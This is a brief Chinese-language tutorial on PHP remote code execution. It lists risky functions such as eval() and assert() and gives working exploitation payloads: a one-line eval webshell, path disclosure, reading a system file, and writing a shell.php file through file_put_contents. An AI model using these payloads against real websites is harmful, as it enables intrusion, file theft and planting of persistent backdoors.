普及远程命令执行漏洞相关函数和利用
远程命令执行漏洞相关函数
在PHP下,允许命令执行的函数有:
>eval()
>assert()
>preg_replace()
>call user func()
>$a($b)
如果页面中存在这些函数并且对于用户的输入没有做严格的过滤,那么就可能造成远程命令执行漏洞。
远程命令执行漏洞的利用
远程命令执行漏洞有以下一些利用方式:
>?a=@eval($_POST[666]);
一句话木马
>?a=print(__FILE__);
获取当前绝对路径
>?a=var_dump(file_get_contents('c:\windows\system32\drivers\etc\hosts'));
读取文件
>?a=var_dump(file_put_contents($_POST[1],$_POST[2]));
1=shell.php&2=<?php phpinfo()?>
写shell